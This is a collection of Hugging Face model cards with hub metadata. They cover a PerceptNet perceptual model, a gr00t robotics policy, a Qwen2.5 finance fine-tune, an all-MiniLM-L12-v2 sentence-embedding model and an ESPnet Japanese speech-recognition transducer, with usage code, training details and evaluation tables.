--- license: apache-2.0 tags: - jax - safetensors --- # Baseline PerceptNet ## Model Description ## How to use it ### Install the model's package from source: ``` git clone https://github.com/Jorgvt/paramperceptnet.git cd paramperceptnet pip install -e . ``` ### 1.Import necessary libraries: ``` import json from huggingface_hub import hf_hub_download import flax import orbax.checkpoint from ml_collections import ConfigDict from paramperceptnet.models import Baseline as PerceptNet ``` ### 2.Download the configuration ``` config_path = hf_hub_download(repo_id="Jorgvt/ppnet-baseline", filename="config.json") with open(config_path, "r") as f: config = ConfigDict(json.load(f)) ``` ### 3. Download the weights #### 3.1. Using `safetensors` ``` from safetensors.flax import load_file weights_path = hf_hub_download(repo_id="Jorgvt/ppnet-baseline", filename="weights.safetensors") variables = load_file(weights_path) variables = flax.traverse_util.unflatten_dict(variables, sep=".") params = variables["params"] ``` #### 3.2. Using `mgspack` ``` weights_path = hf_hub_download(repo_id="Jorgvt/ppnet-fully-trained", filename="weights.msgpack") with open(weights_path, "rb") as f: variables = orbax.checkpoint.msgpack_utils.msgpack_restore(f.read()) variables = jax.tree_util.tree_map(lambda x: jnp.array(x), variables) params = variables["params"] ``` ### 4. Use the model ``` from jax import numpy as jnp model = PerceptNet(config) pred = model.apply({"params": params}, jnp.ones((1,384,512,3))) ```
phospho-app/JenniferJ-gr00t-Orange-brick-in-black-box-bvegk
phospho-app
2025-06-11T09:51:01Z
0
0
null
[ "safetensors", "gr00t_n1", "phosphobot", "gr00t", "region:us" ]
null
2025-06-11T09:33:42Z
--- tags: - phosphobot - gr00t task_categories: - robotics --- # gr00t Model - phospho Training Pipeline ## This model was trained using **phospho**. Training was successfull, try it out on your robot! ## Training parameters: - **Dataset**: [LegrandFrederic/Orange-brick-in-black-box](https://huggingface.co/datasets/LegrandFrederic/Orange-brick-in-black-box) - **Wandb run URL**: None - **Epochs**: 10 - **Batch size**: 27 - **Training steps**: None 📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme) 🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance-1000-v4
ibrahimbukhariLingua
2025-06-11T09:45:38Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-3B-Instruct", "base_model:finetune:Qwen/Qwen2.5-3B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:45:23Z
--- base_model: Qwen/Qwen2.5-3B-Instruct library_name: transformers model_name: qwen2.5-3b-en-wikipedia-finance-1000-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-3b-en-wikipedia-finance-1000-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-3B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance-1000-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
EmaRimoldi/test-model
EmaRimoldi
2025-06-11T09:44:42Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "bert", "feature-extraction", "sentence-similarity", "transformers", "en", "dataset:s2orc", "dataset:flax-sentence-embeddings/stackexchange_xml", "dataset:ms_marco", "dataset:gooaq", "dataset:yahoo_answers_topics", "dataset:code_search_net", "dataset:search_qa", "dataset:eli5", "dataset:snli", "dataset:multi_nli", "dataset:wikihow", "dataset:natural_questions", "dataset:trivia_qa", "dataset:embedding-data/sentence-compression", "dataset:embedding-data/flickr30k-captions", "dataset:embedding-data/altlex", "dataset:embedding-data/simple-wiki", "dataset:embedding-data/QQP", "dataset:embedding-data/SPECTER", "dataset:embedding-data/PAQ_pairs", "dataset:embedding-data/WikiAnswers", "arxiv:1904.06472", "arxiv:2102.07033", "arxiv:2104.08727", "arxiv:1704.05179", "arxiv:1810.09305", "license:apache-2.0", "autotrain_compatible", "text-embeddings-inference", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T09:44:32Z
--- language: en license: apache-2.0 library_name: sentence-transformers tags: - sentence-transformers - feature-extraction - sentence-similarity - transformers datasets: - s2orc - flax-sentence-embeddings/stackexchange_xml - ms_marco - gooaq - yahoo_answers_topics - code_search_net - search_qa - eli5 - snli - multi_nli - wikihow - natural_questions - trivia_qa - embedding-data/sentence-compression - embedding-data/flickr30k-captions - embedding-data/altlex - embedding-data/simple-wiki - embedding-data/QQP - embedding-data/SPECTER - embedding-data/PAQ_pairs - embedding-data/WikiAnswers pipeline_tag: sentence-similarity --- # all-MiniLM-L12-v2 This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 384 dimensional dense vector space and can be used for tasks like clustering or semantic search. ## Usage (Sentence-Transformers) Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed: ``` pip install -U sentence-transformers ``` Then you can use the model like this: ```python from sentence_transformers import SentenceTransformer sentences = ["This is an example sentence", "Each sentence is converted"] model = SentenceTransformer('sentence-transformers/all-MiniLM-L12-v2') embeddings = model.encode(sentences) print(embeddings) ``` ## Usage (HuggingFace Transformers) Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings. ```python from transformers import AutoTokenizer, AutoModel import torch import torch.nn.functional as F #Mean Pooling - Take attention mask into account for correct averaging def mean_pooling(model_output, attention_mask): token_embeddings = model_output[0] #First element of model_output contains all token embeddings input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float() return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9) # Sentences we want sentence embeddings for sentences = ['This is an example sentence', 'Each sentence is converted'] # Load model from HuggingFace Hub tokenizer = AutoTokenizer.from_pretrained('sentence-transformers/all-MiniLM-L12-v2') model = AutoModel.from_pretrained('sentence-transformers/all-MiniLM-L12-v2') # Tokenize sentences encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt') # Compute token embeddings with torch.no_grad(): model_output = model(**encoded_input) # Perform pooling sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask']) # Normalize embeddings sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1) print("Sentence embeddings:") print(sentence_embeddings) ``` ------ ## Background The project aims to train sentence embedding models on very large sentence level datasets using a self-supervised contrastive learning objective. We used the pretrained [`microsoft/MiniLM-L12-H384-uncased`](https://huggingface.co/microsoft/MiniLM-L12-H384-uncased) model and fine-tuned in on a 1B sentence pairs dataset. We use a contrastive learning objective: given a sentence from the pair, the model should predict which out of a set of randomly sampled other sentences, was actually paired with it in our dataset. We developped this model during the [Community week using JAX/Flax for NLP & CV](https://discuss.huggingface.co/t/open-to-the-community-community-week-using-jax-flax-for-nlp-cv/7104), organized by Hugging Face. We developped this model as part of the project: [Train the Best Sentence Embedding Model Ever with 1B Training Pairs](https://discuss.huggingface.co/t/train-the-best-sentence-embedding-model-ever-with-1b-training-pairs/7354). We benefited from efficient hardware infrastructure to run the project: 7 TPUs v3-8, as well as intervention from Googles Flax, JAX, and Cloud team member about efficient deep learning frameworks. ## Intended uses Our model is intented to be used as a sentence and short paragraph encoder. Given an input text, it ouptuts a vector which captures the semantic information. The sentence vector may be used for information retrieval, clustering or sentence similarity tasks. By default, input text longer than 256 word pieces is truncated. ## Training procedure ### Pre-training We use the pretrained [`microsoft/MiniLM-L12-H384-uncased`](https://huggingface.co/microsoft/MiniLM-L12-H384-uncased) model. Please refer to the model card for more detailed information about the pre-training procedure. ### Fine-tuning We fine-tune the model using a contrastive objective. Formally, we compute the cosine similarity from each possible sentence pairs from the batch. We then apply the cross entropy loss by comparing with true pairs. #### Hyper parameters We trained ou model on a TPU v3-8. We train the model during 100k steps using a batch size of 1024 (128 per TPU core). We use a learning rate warm up of 500. The sequence length was limited to 128 tokens. We used the AdamW optimizer with a 2e-5 learning rate. The full training script is accessible in this current repository: `train_script.py`. #### Training data We use the concatenation from multiple datasets to fine-tune our model. The total number of sentence pairs is above 1 billion sentences. We sampled each dataset given a weighted probability which configuration is detailed in the `data_config.json` file. | Dataset | Paper | Number of training tuples | |--------------------------------------------------------|:----------------------------------------:|:--------------------------:| | [Reddit comments (2015-2018)](https://github.com/PolyAI-LDN/conversational-datasets/tree/master/reddit) | [paper](https://arxiv.org/abs/1904.06472) | 726,484,430 | | [S2ORC](https://github.com/allenai/s2orc) Citation pairs (Abstracts) | [paper](https://aclanthology.org/2020.acl-main.447/) | 116,288,806 | | [WikiAnswers](https://github.com/afader/oqa#wikianswers-corpus) Duplicate question pairs | [paper](https://doi.org/10.1145/2623330.2623677) | 77,427,422 | | [PAQ](https://github.com/facebookresearch/PAQ) (Question, Answer) pairs | [paper](https://arxiv.org/abs/2102.07033) | 64,371,441 | | [S2ORC](https://github.com/allenai/s2orc) Citation pairs (Titles) | [paper](https://aclanthology.org/2020.acl-main.447/) | 52,603,982 | | [S2ORC](https://github.com/allenai/s2orc) (Title, Abstract) | [paper](https://aclanthology.org/2020.acl-main.447/) | 41,769,185 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title, Body) pairs | - | 25,316,456 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title+Body, Answer) pairs | - | 21,396,559 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title, Answer) pairs | - | 21,396,559 | | [MS MARCO](https://microsoft.github.io/msmarco/) triplets | [paper](https://doi.org/10.1145/3404835.3462804) | 9,144,553 | | [GOOAQ: Open Question Answering with Diverse Answer Types](https://github.com/allenai/gooaq) | [paper](https://arxiv.org/pdf/2104.08727.pdf) | 3,012,496 | | [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Title, Answer) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 1,198,260 | | [Code Search](https://huggingface.co/datasets/code_search_net) | - | 1,151,414 | | [COCO](https://cocodataset.org/#home) Image captions | [paper](https://link.springer.com/chapter/10.1007%2F978-3-319-10602-1_48) | 828,395| | [SPECTER](https://github.com/allenai/specter) citation triplets | [paper](https://doi.org/10.18653/v1/2020.acl-main.207) | 684,100 | | [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Question, Answer) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 681,164 | | [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Title, Question) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 659,896 | | [SearchQA](https://huggingface.co/datasets/search_qa) | [paper](https://arxiv.org/abs/1704.05179) | 582,261 | | [Eli5](https://huggingface.co/datasets/eli5) | [paper](https://doi.org/10.18653/v1/p19-1346) | 325,475 | | [Flickr 30k](https://shannon.cs.illinois.edu/DenotationGraph/) | [paper](https://transacl.org/ojs/index.php/tacl/article/view/229/33) | 317,695 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (titles) | | 304,525 | | AllNLI ([SNLI](https://nlp.stanford.edu/projects/snli/) and [MultiNLI](https://cims.nyu.edu/~sbowman/multinli/) | [paper SNLI](https://doi.org/10.18653/v1/d15-1075), [paper MultiNLI](https://doi.org/10.18653/v1/n18-1101) | 277,230 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (bodies) | | 250,519 | | [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (titles+bodies) | | 250,460 | | [Sentence Compression](https://github.com/google-research-datasets/sentence-compression) | [paper](https://www.aclweb.org/anthology/D13-1155/) | 180,000 | | [Wikihow](https://github.com/pvl/wikihow_pairs_dataset) | [paper](https://arxiv.org/abs/1810.09305) | 128,542 | | [Altlex](https://github.com/chridey/altlex/) | [paper](https://aclanthology.org/P16-1135.pdf) | 112,696 | | [Quora Question Triplets](https://quoradata.quora.com/First-Quora-Dataset-Release-Question-Pairs) | - | 103,663 | | [Simple Wikipedia](https://cs.pomona.edu/~dkauchak/simplification/) | [paper](https://www.aclweb.org/anthology/P11-2117/) | 102,225 | | [Natural Questions (NQ)](https://ai.google.com/research/NaturalQuestions) | [paper](https://transacl.org/ojs/index.php/tacl/article/view/1455) | 100,231 | | [SQuAD2.0](https://rajpurkar.github.io/SQuAD-explorer/) | [paper](https://aclanthology.org/P18-2124.pdf) | 87,599 | | [TriviaQA](https://huggingface.co/datasets/trivia_qa) | - | 73,346 | | **Total** | | **1,170,060,424** |
fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132
fujie
2025-06-11T09:44:09Z
0
0
espnet
[ "espnet", "audio", "automatic-speech-recognition", "jp", "dataset:cejc_pron_aux", "arxiv:1804.00015", "license:cc-by-4.0", "region:us" ]
automatic-speech-recognition
2025-06-11T09:41:06Z
--- tags: - espnet - audio - automatic-speech-recognition language: jp datasets: - cejc_pron_aux license: cc-by-4.0 --- ## ESPnet2 ASR model ### `fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132` This model was trained by Shinya Fujie using cejc_pron_aux recipe in [espnet](https://github.com/espnet/espnet/). ### Demo: How to use in ESPnet2 Follow the [ESPnet installation instructions](https://espnet.github.io/espnet/installation.html) if you haven't done that already. ```bash cd espnet git checkout 03f77b8db5be7503c3a540b113178b34cfbccee8 pip install -e . cd egs2/cejc_pron_aux/asr1 ./run.sh --skip_data_prep false --skip_train true --download_model fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132 ``` <!-- Generated by scripts/utils/show_asr_result.sh --> # RESULTS ## Environments - date: `Wed Jun 11 12:40:31 JST 2025` - python version: `3.11.11 (main, Dec 11 2024, 16:28:39) [GCC 11.2.0]` - espnet version: `espnet 202503` - pytorch version: `pytorch 2.3.0+cu121` - Git hash: `03f77b8db5be7503c3a540b113178b34cfbccee8` - Commit date: `Tue Jun 10 16:01:35 2025 +0900` ## exp/asr_train_asr_cbs_transducer_081616_hop132 ### WER |dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err| |---|---|---|---|---|---|---|---|---| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10f|953|11908|84.6|8.4|7.0|4.0|19.4|63.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10m|957|16092|86.8|8.0|5.2|4.3|17.5|66.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20f|1466|18326|87.3|7.3|5.5|3.3|16.1|62.3| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20m|1772|23756|82.6|10.2|7.2|4.2|21.6|64.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30f|1734|24116|90.6|5.4|4.0|3.6|13.0|55.6| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30m|1688|20116|69.3|17.9|12.8|4.3|35.0|66.9| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40f|1477|20717|85.9|6.9|7.2|3.6|17.7|58.4| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40m|1498|24747|87.1|6.7|6.2|3.5|16.3|63.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50f|1450|26584|90.1|5.1|4.8|3.4|13.4|62.5| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50m|1499|22572|87.9|6.8|5.3|3.6|15.7|62.3| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60f|1335|21810|81.7|10.4|7.8|4.4|22.7|65.0| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60m|1621|24151|83.1|9.4|7.5|3.3|20.2|68.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70f|906|9542|83.8|8.8|7.3|4.2|20.4|57.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70m|894|12490|88.1|7.0|4.9|4.6|16.4|58.3| ### CER |dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err| |---|---|---|---|---|---|---|---|---| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10f|953|24583|88.0|5.0|7.0|4.0|15.9|63.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10m|957|33749|90.1|4.6|5.3|4.1|14.0|66.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20f|1466|37024|89.8|4.6|5.7|3.1|13.3|62.3| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20m|1772|47838|86.9|6.4|6.7|4.1|17.2|64.1| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30f|1734|48968|92.5|3.3|4.2|3.7|11.2|55.6| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30m|1688|41067|77.2|11.0|11.8|4.3|27.1|66.9| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40f|1477|42609|88.3|4.3|7.4|3.4|15.2|58.4| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40m|1498|51748|88.8|4.1|7.0|3.3|14.5|63.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50f|1450|54181|91.8|3.5|4.7|3.4|11.6|62.5| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50m|1499|46031|90.5|4.2|5.3|3.4|13.0|62.3| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60f|1335|45028|86.1|6.3|7.6|4.0|17.8|65.0| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60m|1621|49442|86.7|5.5|7.8|3.2|16.5|68.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70f|906|19386|87.2|5.4|7.4|4.2|17.0|57.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70m|894|26203|90.8|4.4|4.9|4.6|13.8|58.3| ### TER |dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err| |---|---|---|---|---|---|---|---|---| ## ASR config <details><summary>expand</summary> ``` config: myconf/train_asr_cbs_transducer_081616_hop132.yaml print_config: false log_level: INFO drop_last_iter: false dry_run: false iterator_type: sequence valid_iterator_type: null output_dir: exp/asr_train_asr_cbs_transducer_081616_hop132 ngpu: 1 seed: 0 num_workers: 1 num_att_plot: 0 dist_backend: nccl dist_init_method: env:// dist_world_size: 2 dist_rank: 0 local_rank: 0 dist_master_addr: localhost dist_master_port: 48739 dist_launcher: null multiprocessing_distributed: true unused_parameters: false sharded_ddp: false use_deepspeed: false deepspeed_config: null gradient_as_bucket_view: true ddp_comm_hook: null cudnn_enabled: true cudnn_benchmark: false cudnn_deterministic: true use_tf32: false collect_stats: false write_collected_feats: false max_epoch: 50 patience: null val_scheduler_criterion: - valid - loss early_stopping_criterion: - valid - loss - min best_model_criterion: - - valid - cer_transducer - min keep_nbest_models: 10 nbest_averaging_interval: 0 grad_clip: 5 grad_clip_type: 2.0 grad_noise: false accum_grad: 6 no_forward_run: false resume: true train_dtype: float32 use_amp: false log_interval: null use_matplotlib: true use_tensorboard: true create_graph_in_tensorboard: false use_wandb: true wandb_project: espnet_ninjal wandb_id: null wandb_entity: null wandb_name: cejc_cbs_td_081616_hop132 wandb_model_log_interval: -1 detect_anomaly: false use_adapter: false adapter: lora save_strategy: all adapter_conf: {} pretrain_path: null init_param: [] ignore_init_mismatch: false freeze_param: [] num_iters_per_epoch: null batch_size: 20 valid_batch_size: null batch_bins: 1500000 valid_batch_bins: null category_sample_size: 10 train_shape_file: - exp/asr_stats_raw_jp_word/train/speech_shape - exp/asr_stats_raw_jp_word/train/text_shape.word valid_shape_file: - exp/asr_stats_raw_jp_word/valid/speech_shape - exp/asr_stats_raw_jp_word/valid/text_shape.word batch_type: numel valid_batch_type: null fold_length: - 80000 - 150 sort_in_batch: descending shuffle_within_batch: false sort_batch: descending multiple_iterator: false chunk_length: 500 chunk_shift_ratio: 0.5 num_cache_chunks: 1024 chunk_excluded_key_prefixes: [] chunk_default_fs: null chunk_max_abs_length: null chunk_discard_short_samples: true train_data_path_and_name_and_type: - - dump/raw/train_nodup/wav.scp - speech - sound - - dump/raw/train_nodup/text - text - text valid_data_path_and_name_and_type: - - dump/raw/train_dev/wav.scp - speech - sound - - dump/raw/train_dev/text - text - text multi_task_dataset: false allow_variable_data_keys: false max_cache_size: 0.0 max_cache_fd: 32 allow_multi_rates: false valid_max_cache_size: null exclude_weight_decay: false exclude_weight_decay_conf: {} optim: adam optim_conf: lr: 0.002 scheduler: warmuplr scheduler_conf: warmup_steps: 25000 token_list: - <blank> - <unk> - '|' - ー - ン - イ - ッ - カ - ナ - テ - ト - タ - ア - ノ - デ - ダ - ソ - コ - <sp> - ウ - シ - モ - ラ - ネ - ル - ス - ワ - オ - マ - ニ - ク - レ - ガ - ヨ - キ - サ - ケ - ヤ - エ - ド - ツ - ハ - リ - チ - ミ - ユ - ジ - ホ - ジャ - ロ - セ - ゴ - ノ+F - メ - バ - ア+F - ブ - チャ - ショ - フ - <mask> - ヒ - ー+F - チョ - パ - ジュ - ゼ - ベ - ズ - グ - ム - ヘ - ゲ - キョ - ジョ - ビ - ン+D - ボ - シュ - ギ - シャ - エ+F - ザ - プ - ト+F - イ+D - ソ+F - キュ - チュ - ポ - リョ - ゾ - ス+D - キャ - ピ - ン+F - ー+D - ッ+F - ウ+D - ヒャ - ア+D - ナ+D - オ+D - ヌ - コ+D - カ+D - ギョ - シ+D - ペ - リャ - ニュ - ソ+D - ッ+D - ティ - ツ+D - ク+D - ハ+D - タ+D - ギャ - ト+D - ヒョ - ディ - エ+D - キ+D - ダ+D - ド+D - ヤ+D - マ+D - ファ - ヒ+D - ホ+D - サ+D - モ+D - フ+D - ヨ+D - ワ+D - ミ+D - ウ+F - ビョ - チ+D - フォ - ム+D - リュ - フェ - ジ+D - ユ+D - ニ+D - ジェ - ケ+D - ガ+D - セ+D - デ+D - ラ+D - フィ - ノ+D - テ+D - ギュ - チェ - リ+D - ズ+D - ミョ - ゼ+D - ニャ - ル+D - ビャ - メ+D - シュ+D - ピョ - ロ+D - ブ+D - バ+D - ショ+D - ウェ - ゴ+D - ヘ+D - トゥ - ピャ - ネ+D - チョ+D - ジュ+D - グ+D - ウィ - レ+D - ビュ - ヌ+D - ニョ - ゲ+D - ボ+D - ビ+D - シェ - キョ+D - パ+D - チュ+D - オ+F - ベ+D - ウォ - ミュ - チャ+D - シャ+D - キュ+D - ピュ - ザ+D - ギ+D - ドゥ - プ+D - ジョ+D - ジャ+D - ヒュ - リョ+D - ポ+D - ミャ - デュ - ヒャ+D - ゾ+D - キャ+D - ピ+D - ペ+D - ファ+D - ヒョ+D - ツォ - ツァ - チェ+D - ギョ+D - ディ+D - トゥ+D - イ+F - フォ+D - ニュ+D - ツェ - ビョ+D - ドゥ+D - フェ+D - ギャ+D - ジェ+D - ティ+D - ナ+F - リュ+D - ヤ+F - フィ+D - ニャ+D - テュ - ビュ+D - ニェ - ヌ+F - ウェ+D - ヴィ - ミャ+D - ヴォ - ド+F - シェ+D - ギュ+D - ホ+F - ツィ - ワ+F - ル+F - ダ+F - マ+F - ウィ+D - ガ+F - ピャ+D - メ+F - スィ - ビャ+D - ニョ+F - ロ+F - ウォ+D - ネ+F - ヴァ - ヴ - フュ - ミョ+D - ズ+F - ヴィ+D - ニャ+F - ミュ+F - デュ+D - ニョ+D - ミュ+D - ツォ+F - ヒェ+D - ヒュ+D - カ+F - ユ+F - リャ+D - ブ+F - ヘ+F - ハ+F - ツォ+D - <sos/eos> init: null input_size: null ctc_conf: dropout_rate: 0.0 ctc_type: builtin reduce: true ignore_nan_grad: null zero_infinity: true brctc_risk_strategy: exp brctc_group_strategy: end brctc_risk_factor: 0.0 joint_net_conf: joint_space_size: 640 use_preprocessor: true use_lang_prompt: false use_nlp_prompt: false token_type: word bpemodel: null non_linguistic_symbols: null cleaner: null g2p: null speech_volume_normalize: null rir_scp: null rir_apply_prob: 1.0 noise_scp: null noise_apply_prob: 1.0 noise_db_range: '13_15' short_noise_thres: 0.5 aux_ctc_tasks: [] frontend: default frontend_conf: hop_length: 132 fs: 16k specaug: specaug specaug_conf: apply_time_warp: true time_warp_window: 5 time_warp_mode: bicubic apply_freq_mask: true freq_mask_width_range: - 0 - 30 num_freq_mask: 2 apply_time_mask: true time_mask_width_range: - 0 - 40 num_time_mask: 2 normalize: global_mvn normalize_conf: stats_file: exp/asr_stats_raw_jp_word/train/feats_stats.npz model: espnet model_conf: ctc_weight: 0.0 report_cer: true report_wer: true preencoder: null preencoder_conf: {} encoder: contextual_block_conformer encoder_conf: output_size: 256 attention_heads: 4 linear_units: 2048 num_blocks: 12 dropout_rate: 0.1 positional_dropout_rate: 0.1 attention_dropout_rate: 0.0 input_layer: conv2d normalize_before: true activation_type: swish macaron_style: true use_cnn_module: true cnn_module_kernel: 15 block_size: 40 hop_size: 16 look_ahead: 16 init_average: true ctx_pos_enc: true postencoder: null postencoder_conf: {} decoder: transducer decoder_conf: rnn_type: lstm num_layers: 1 hidden_size: 512 dropout: 0.1 dropout_embed: 0.2 preprocessor: default preprocessor_conf: {} required: - output_dir - token_list version: '202503' distributed: true ``` </details> ### Citing ESPnet ```BibTex @inproceedings{watanabe2018espnet, author={Shinji Watanabe and Takaaki Hori and Shigeki Karita and Tomoki Hayashi and Jiro Nishitoba and Yuya Unno and Nelson Yalta and Jahn Heymann and Matthew Wiesner and Nanxin Chen and Adithya Renduchintala and Tsubasa Ochiai}, title={{ESPnet}: End-to-End Speech Processing Toolkit}, year={2018}, booktitle={Proceedings of Interspeech}, pages={2207--2211}, doi={10.21437/Interspeech.2018-1456}, url={http://dx.doi.org/10.21437/Interspeech.2018-1456} } ``` or arXiv: ```bibtex @misc{watanabe2018espnet, title={ESPnet: End-to-End Speech Processing Toolkit}, author={Shinji Watanabe and Takaaki Hori and Shigeki Karita and Tomoki Hayashi and Jiro Nishitoba and Yuya Unno and Nelson Yalta and Jahn Heymann and Matthew Wiesner and Nanxin Chen and Adithya Renduchintala and Tsubasa Ochiai}, year={2018}, eprint={1804.00015}, archivePrefix={arXiv}, primaryClass={cs.CL} } ```